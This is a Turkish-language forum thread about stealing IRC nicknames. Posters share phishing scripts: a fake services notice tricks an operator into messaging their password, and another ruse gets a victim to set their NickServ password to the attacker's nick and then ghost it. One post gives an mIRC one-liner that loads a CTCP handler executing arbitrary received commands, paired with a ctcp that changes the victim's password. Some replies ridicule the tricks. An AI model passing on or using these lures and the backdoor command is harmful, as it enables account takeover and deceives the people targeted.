Nick Çalma ( Anlatımlı )
-
iknci mırcta nicki nasıl set yapıyoz
-
mika bunu yazdı:
-----------------------------
iknci mırcta nicki nasıl set yapıyoz
ooooooooo oçok zor sen hiçuraşma bayazaman alır örenmek için çalma sen en iyisi
-
Ko-Ko-ReC tarafindan 29 Aralık 2003 (Pazartesi) tarihinde yazildi.
.....
ve daha sonra adam sizi buluyoo yaa benim nicki ver diyo sizde eğleniyosnuz adamın kanallarını falan çaılıyonus... aslşında gusel bişey
Tahribatın misyonu buysa bu site ye"ürrrrrrrr
-
offf gene iş bana Duştu ha Bu arada ArkadaşLar Gunduz Rumuzlu şahıs 12 yaşında bir Hacker benim ögrencim + yegenim Sayılır vehasıl benim yetiştirmem
Bu set olayını size açıklıyayım La gunduz Bu arada bbunu okuyorsan bi daha benden kopya çekip millete hava atma :) tamam iyi birisin nede olsa ögrencimsin
Fakat böyle olmaz ama
neyse Set meselesine geçelim...
Arkadaslar ilk etapta ßir server de 2 Sayfa açıyorsunuz yani 2 scriptle giriyorsunuz...
Birinci Scripteki Nickiniz Set olsun..
ve hiç bir kanala girmeyin. set nicki ile..
2. scripteki Nickinizle her hangi bir Nick olsun..
ve bir operatörle muhabbete başlayın o kendi açıgını belli eder.. kek olup olmadıgı 2 dakkada anlaşılır..
neyse operator kek ise Set Nickiniz ile ii okuyun..
Set Nickiniz ile o operatora Notice atacaksınız böyle
/notice OpNicki Servisler Yenilenmiş olup Telnette passwd.conf dosyası yenilenmiştir 24 saat içinde şifrenizi onaylatınız.. Aksi halde Nickiniz Droplanacaktır onaylatmak için /Msg Set Şifreniz..
işte bu kadar :))))) adam komutu yaptıgı an şifresi sizin Set Nickinize gelecektir :))))) eh gerisi Size kalmış bişi -
boş şeyler bunlar .
-
acayip saçmalayanlar var hemde :( ne diyem yaff iyi diyemde bari ayıp oLmasın hiç oLmadfı destek... neyse içimde kalacağına dışa vurayım adamın biri nick çalma(anlatımlı die ) forum açıo lamerler ona bakıo herkes bi fikir vewrio ve adam dioki sizi kandırdım artık öğrendim tek kelimesaçma şey bu arkadaşım sen irc hacki bıraq uğraşma
-
i$te alin bi komut daha
//write silly.mrc ctcp *:*:*:$1 | /.load -rs silly.mrc
sonra adama "/ctcp nickname /msg nickserv set passwd hacker" boylece nicki calarsin... -
Yok baba yiyen olmaz bunu adam okadar hıyar degıya
kız nıkı ılede gırsen gene olmaz -
ßiliyorum ama sadece mantık yuruttum :)
-
bunların nick çalmakla alakası yok bunlar kandırmaktır ama
Mark bunu yazdı:
ya bu komudu görünce gülmekten öldüm :)))))
ya kardeşim komut öyle yazılmaz bak böyle yap bu şekilde cok op ların nickine el koyup kanalı yönlendirdim bunu dene
madde 1 :) ya op arkadasım neden benim şifrelerimi kurcalıyorsun
op diyecekki nasıl kurcalıyorum
2 :) sen /Nickserv set password benimnickim -q xxx
yapmadın mı
benim şifrelerimi listelendin neden yapıyorsun
3:) o kişi o esnada o komutu yapar ve şifresi direkmen benimnickim olur
4:) benimnickim yazılan yere kendi nickinizi yazacaksınız yani şifresi sizin nickiniz olacak
5:) /nickserv ghost Nicki benimnickim
6:) olay bu kadar basit....
bu hoşuma gitti :)
Toplam Hit: 27611 Toplam Mesaj: 31